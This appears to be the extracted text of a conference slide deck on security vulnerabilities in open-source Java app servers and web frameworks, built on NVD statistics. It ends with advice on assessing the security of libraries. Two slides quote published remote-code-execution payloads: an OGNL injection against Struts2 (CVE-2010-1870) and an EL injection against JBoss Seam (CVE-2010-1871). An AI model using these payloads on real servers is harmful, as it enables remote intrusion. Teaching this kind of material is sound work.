Security Vulnerabilities in Open Source Java Libraries. Patrycja Wegrzynowicz CTO, Yonita, Inc.

Security Vulnerabilities in Open Source Java Libraries Patrycja Wegrzynowicz CTO, Yonita, Inc.

About Me Programmer at heart Researcher in mind Speaker with passion Entrepreneur by need @yonlabs

Agenda Motivation and methodology Security vulnerabilities Stats and examples App and web servers Web frameworks Approach to security What to look for Where to look at

Disclaimer I do not aim at bashing OSS!

Hello World in cloud is involve 1 load balancer, 3 web server and 2 database server DevOps_Borat, Twitter

Underneath Application Libraries App & Web Servers Databases Operating Systems Infrastructure

Underneath Application Libraries App & Web Servers Databases Operating Systems Infrastructure

Sources The National Vulnerability Database NIST Computer Security Division DHS National Cyber Security Division/US CERT http://nvd.nist.gov/ The Open Source Vulnerability Database Open Security Foundation http://www.osvdb.org/ The Exploit Database http://www.exploit-db.com/

Common Vulnerability Scoring System v2 Access Vector Local Adjecent network Remote Access Complexity High Medium Low Authentication Multiple instances Single instance None Confidentiality None Partial Complete Integrity None Partial Complete Availability None Partial Complete

Common Weakness Enumeration

Vulnerability Types NVD to CWE Mapping Authentication Issues Credentials Management Permissions, Privileges, and Access Control Buffer Errors Cross-Site Request Forgery (CSRF) Cross-Site Scripting (XSS) Cryptographic Issues Path Traversal Code Injection Format String Vulnerability Configuration Information Leak/Disclosure Input Validation Numeric Errors OS Command Injections Race Condition Resource Management Errors SQL Injection Link Following Not in CWE Insufficient Information Design Error Other

App & Web Servers

App & Web Servers WebSphere 7% Other 8% GlassFish 8% Jetty 8% WebLogic 10% JBoss 26% Tomcat 33% Survey by ZeroTurnaround

Number of Vulnerabilities OSS Tomcat Jboss AS Jboss EAP GlassFish Jetty 100 7 20 14 20 Based on NVD

Number of Vulnerabilities OSS and Proprietrary Tomcat Jboss AS Jboss EAP GlassFish Jetty WebLogic WebSphere 185 201 100 7 20 14 20 Based on NVD

Number of Vulnerabilities OSS vs Proprietary OSS (5 platforms) 29% Proprietary (2 platforms) 71% Based on NVD

20 18 16 14 12 10 8 6 4 2 0 Vulnerabilities by Year OSS 2000 01 02 03 04 05 06 07 08 09 10 11 12 Tomcat Jboss AS Jboss EAP GlassFish Jetty Based on NVD

Vulnerabilities by Year OSS + Proprietary 50 45 40 35 30 25 20 15 10 5 0 Tomcat Jboss AS Jboss EAP GlassFish Jetty WebLogic WebSphere Based on NVD

Vulnerabilities by Year OSS 30 25 20 15 10 Jetty GlassFish Jboss EAP Jboss AS Tomcat 5 0 2000 01 02 03 04 05 06 07 08 09 10 11 12 Based on NVD

Vulnerabilities by Year OSS and Proprietary 90 80 70 60 50 40 30 20 10 WebSphere WebLogic Jetty GlassFish Jboss EAP Jboss AS Tomcat 0 2000 01 02 03 04 05 06 07 08 09 10 11 12 Based on NVD

Vulnerabilities Scoring LOW [0,4) MEDIUM [4,7) HIGH [7,8] CRITICAL [8,9) WTF?! [9,10] 10 4 2 1 10 1 3 1 32 29 28 80 13 10 17 122 126 2 4 1 2 0 0 20 21 Tomcat Jboss AS Jboss EAP GlassFish Jetty WebLogic WebSphere Based on NVD

Confidentiality Impact 100% 90% 80% 70% 60% 50% 40% 30% 20% 10% 0% 2 62 36 1 6 0 0 13 6 1 0 6 12 7 8 22 32 112 99 51 71 None Partial Complete Based on NVD

Integrity Impact 100% 90% 80% 70% 60% 50% 40% 30% 20% 10% 0% 0 45 55 1 4 2 0 9 10 1 8 5 0 18 32 11 91 99 9 76 71 None Partial Complete Based on NVD

Availability Impact 100% 90% 80% 70% 60% 50% 40% 30% 20% 10% 0% 1 28 71 1 4 2 0 9 11 3 5 6 0 6 14 20 32 83 99 82 71 None Partial Complete Based on NVD

Vulnerability Types by Server 100% 80% 60% 40% 20% 0% Authentication Issues Permissions, Privileges, and Access Control CSRF Cryptographic Issues Code Injection Information Leak Numeric Errors Resource Management Errors Link Following Unknown Credentials Management Buffer Errors XSS Path Traversal Configuration Input Validation Race Condition SQL Injection Design Error Based on NVD

Top 3 Vulnerabilities Credentials Management CSRF Path Traversal Input Validation Permissions XSS Information Leak 13 1 5 1 2 6 19 11 1 2 3 3 4 26 9 1 7 5 7 22 Tomcat Jboss AS Jboss EAP GlassFish Jetty WebLogic WebSphere Based on NVD

3 and More Vulnerabilities Authentication Issues Permissions,...l XSS Path Traversal Information Leak Resource Management Errors Credentials Management CSRF Cryptographic Issues Configuration Input Validation Design Error 8 3 12 3 3 14 5 13 6 19 3 10 8 3 4 26 11 7 5 4 7 22 9 7 4 Tomcat Jboss AS Jboss EAP GlassFish Jetty WebLogic WebSphere Based on NVD

Total Vulnerabilities by Type 60 50 40 30 20 10 0 Cross-Site Scripting (XSS) Permissions, Privileges, Information Leak Input Validation Resource Management Design Error Cryptographic Issues Path Traversal Authentication Issues Credentials Management Cross-Site Request Configuration Buffer Errors Code Injection Numeric Errors Race Condition Link Following SQL Injection WebSphere WebLogic Jetty GlassFish Jboss EAP Jboss AS Tomcat Based on NVD

Max CVSS v2: 10 CVE-2011-0807 20-04-2011 Unspecified vulnerability in Oracle Sun GlassFish Enterprise Server 2.1, 2.1.1, and 3.0.1, and Sun Java System Application Server 9.1, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Administration. AV: Network AC: Low Au: None required C: Complete I: Complete A: Complete Insufficient information

Min CVSS v2: 1.2 CVE-2010-3718 2/10/11 Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack. AV: Local access AC: High Au: None required C: None I: Partial A: None Design Error

Web Frameworks

Vulnerabilities Selected Frameworks 16 14 12 10 8 6 Struts2 Jboss Seam GWT 4 2 0 Vulnerabilities

Apache Struts 2 (latest release 2.3.4.1)

CVE-2010-1870 exploit (Struts2) Found by and exploit shown by Meder Kydyraliev Based on his previous bug: XW-641 ('\u0023' + 'session[\'user\']')(unused)=0wn3d #session['user']=0wn3d ActionContext.getContext().getSession().put( user, 0wn3d ) ParametersInterceptor blacklists # to prevent tampering with server-side data

CVE-2010-1870: Struts 2 8/17/10 The OGNL extensive expression evaluation capability in XWork in Struts 2.0.0 through 2.1.8.1, as used in Atlassian Fisheye, Crucible, and possibly other products, uses a permissive whitelist, which allows remote attackers to modify server-side context objects and bypass the # protection mechanism in ParameterInterceptors via the (1) #context, (2) #_memberaccess, (3) #root, (4) #this, (5) #_typeresolver, (6) #_classresolver, (7) #_traceevaluations, (8) #_lastevaluation, (9) #_keeplastevaluation, and possibly other OGNL context variables, a different vulnerability AV: Network AC: Low Au: None required C: None I: Partial A: None [Design Error (NVD-CWE-DesignError)]

CVE-2010-1870 exploit Guards: xwork.methodaccessor.denymethodexecution #_memberaccess.allowstaticaccess Exploit by Meder Kydyraliev #_memberaccess[ allowstaticmethodaccess ] = true #foo = new java.lang.boolean( false ) #context[ xwork.methodaccessor.denymethodexecution ] = #foo #rt = @java.lang.runtime@getruntime() #rt.exec( touch /tmp/dir, null) /HelloWorld.action?('\u0023_memberAccess [\'allowstaticmethodaccess\']')(meh)=true&(aaa)(('\u0023context [\'xwork.methodaccessor.denymethodexecution\']\u003d\u0023foo') (\u0023foo\u003dnew%20java.lang.boolean("false")))&(ssss)((\u0023r t\ ('mkdir\u0020/tmp/pwned'\u002cnull)))=1

CVE-2010-1871: JBoss Seam 08/05/2010 JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured. 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) Input Validation

CVE-2010-1871 exploit Found by and exploit provided by Meder Kydyraliev /seambooking/home.seam?actionoutcome=/pwn.xht ml?pwned%3d%23 {expressions.getclass().forname ('java.lang.runtime').getdeclaredmethods()[19]. invoke (expressions.getclass().forname('java.lang.r untime').getdeclaredmethods()[7].invoke(null), 'mkdir /tmp/ PWNED')}

How to Assess the Security Level of a Library?

What to Look For? Vulnerabilities and trend Complexity Culture

Complexity

Culture The best indicator of the library s future security is culture that places value on security and clear evidence of broad and rigorous security analysis. Jeff Williams, CEO, Aspect Security

What to Look For? Known security vulnerabilities in an OSS library and trends Library complexity, its design and its dependencies Security in software development process of an OSS library Security during development Security built into the development process Security during issue handling Clear and transparent issue handling Undisclosed details until fixed Security response team Security bulletins Releases and release notes containing security information

Where to Look At? Vulnerability Databases Open Source Vulnerability Database National Vulnerability Database Exploit Database Vendor site Development process Issue tracker Security bulletins Release notes Dependency hell Use support of a dependency management tool (e.g. update reports in maven)

patrycja@yonita.com @yonlabs